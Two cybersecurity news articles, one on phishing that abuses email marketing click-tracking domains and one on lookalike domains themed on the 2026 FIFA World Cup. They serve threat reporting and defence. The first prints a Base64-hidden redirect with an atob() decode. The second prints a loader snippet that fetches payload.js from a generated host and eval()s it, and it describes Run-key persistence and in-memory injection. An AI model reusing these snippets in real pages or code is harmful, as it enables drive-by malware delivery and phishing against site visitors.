Cybercriminals are increasingly exploiting legitimate email marketing platforms to launch sophisticated phishing campaigns, leveraging the trusted reputation of these services to bypass security filters and deceive victims.

This emerging threat vector represents a significant evolution in phishing tactics, where attackers abuse click-tracking domains and URL redirection services provided by established email marketing companies to mask their malicious intentions.

The campaigns utilize platforms such as Klaviyo’s ‘klclick3.com’ and Drip Global’s ‘dripemail2.com’ domains, which are legitimate click-tracking services designed to monitor user interactions with marketing emails.

By routing malicious URLs through these trusted domains, attackers create a veneer of legitimacy that helps their phishing emails evade detection by traditional security systems.

The technique is particularly insidious because it exploits the inherent trust users place in recognized marketing platforms.

Recent analysis reveals that these campaigns often employ sophisticated lures, including fake voicemail notifications, DocuSign document requests, and payment-related messages.

The attackers demonstrate remarkable adaptability, combining traditional phishing techniques with modern evasion methods including CAPTCHA verification, compromised domains, and abuse of cloud services like Amazon Web Services and Cloudflare.

Trustwave researchers identified a significant increase in phishing URLs containing familiar patterns and similar phishing templates, noting the resurgence in abuse of email marketing platforms alongside widespread use of URL redirectors.

Their PageML system, which combines machine learning components with URL intelligence frameworks, has been instrumental in detecting these evolving threats in real-time.

Advanced Redirection and Evasion Techniques

The technical sophistication of these campaigns is evident in their multi-layered redirection mechanisms.

In one documented case, attackers used a Base64-encoded redirection scheme where the initial phishing URL contained encoded strings that, when decoded, revealed the actual malicious destination.

The source code analysis showed:-

ucis.RedirectUrl = "aHR0cHM6Ly9vZmZpY21hc2RpbmRvbW1qZW9haWV1bnQuZXN6a3FlaHJoeXpkdXF2d3JiZ3h1dWd4YXF1bXJtLmlwLWRkbnMuY29tL2YvNFNTd08yUU5LQ3B5MWdDeEtzX0w=";
ucis.RedirectUrl = atob(ucis.RedirectUrl); // decode to real URL

Additionally, attackers implement anti-analysis measures by disabling right-click functionality through JavaScript event listeners:-

addEventListener("contextmenu", function(e) {
    e.preventDefault();
});

The campaigns also employ chameleon phishing techniques, dynamically fetching company information and logos using services like Clearbit to create personalized phishing pages that appear legitimate to specific victims.

These pages often integrate Cloudflare Turnstile for human verification, adding another layer of evasion while appearing to provide security measures.

The abuse of legitimate infrastructure creates significant challenges for cybersecurity teams, as traditional blacklisting approaches become ineffective when malicious content is hosted on trusted domains.

This trend underscores the need for advanced behavioral analysis and machine learning-based detection systems capable of identifying malicious intent regardless of the hosting infrastructure’s reputation.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Hackers Abuse Legitimate Email Marketing Platforms to Disguise Malicious Links appeared first on Cyber Security News.

Security researchers have observed an unprecedented surge in domain registrations in recent months, closely tied to the upcoming 2026 FIFA World Cup tournament.

These domains, often masquerading as legitimate ticketing portals, merchandise outlets, or live-stream platforms, serve as precursors to a multifaceted cyber campaign designed to harvest credentials, distribute malware, and siphon financial data.

Attackers are leveraging the high-profile nature of the event, registering deceptive domains up to eighteen months in advance to avoid detection and establish credibility among unsuspecting fans.

As interest in match schedules and ticket availability peaks, visitors are lured into interacting with these fraudulent websites, unknowingly initiating the infection chain.

BeforeAI analysts identified a cluster of over 498 suspicious domains containing terms such as “fifa,” “worldcup,” and host city names, with registrations peaking in August 2025.

These domains are distributed across top registrars including GoDaddy.com and Namecheap, as well as low-friction TLDs like .online and .shop.

In many cases, threat actors repurpose aged domains previously registered for other sporting events, further complicating attribution and takedown efforts.

The registration of domains anchored to future tournaments in 2030 and 2034 highlights the long-term strategy employed by these cybercriminal groups.

The impact of this preparatory activity extends beyond simple phishing attempts. Victims who input personal details on these sites may be redirected to payload delivery servers hosting trojan droppers capable of evading signature-based detection.

Initial reconnaissance indicates that the malware leverages polymorphic loaders to modify its decryption routines on each execution, thwarting static analysis.

Command-and-control (C2) communications occur over HTTPS to blend with legitimate traffic, while fallback DNS tunnels allow for data exfiltration even if primary channels are disrupted.

Infection Mechanism and Persistence Tactics

Delving deeper into the infection mechanism reveals a staged process beginning with a malicious JavaScript injected into compromised landing pages.

When unsuspecting users visit URLs like watchfootball-live.com, the script checks the browser environment and delivers a second-stage payload only if specific conditions are met, such as running outdated browser plugins. This selective delivery reduces exposure to sandbox analysis.

The following snippet demonstrates how the script computes a time-based hash to retrieve the payload URL:-

(function() {
    const key = "WorldCup2026";
    const now = Math.floor(Date.now() / 3600000);
    const hash = btoa(unescape(encodeURIComponent(key + now))).substr(0, 16);
    fetch(`https://${hash}.cdn-delivery.net/payload.js`)
        .then(response => response. Text())
        .then(eval);
})();

Once executed, the payload writes a small loader to the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to achieve persistence.

It then downloads additional modules disguised as harmless image files, which are in fact encrypted executables unpacked in memory and injected into legitimate processes such as svchost.exe.

By employing reflective DLL injection, the malware avoids dropping components to disk, significantly reducing forensic footprints.

The sophisticated use of aged domains, combined with polymorphic and in-memory techniques, underscores the evolving threat landscape as the world gears up for the 2026 FIFA World Cup.

Continuous monitoring and proactive domain blacklisting will be crucial to safeguard fans and organizations from this looming cyberattack.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

The post Hackers Registering Domains to Launch Cyberattack Targeting 2026 FIFA World Cup Tournament appeared first on Cyber Security News.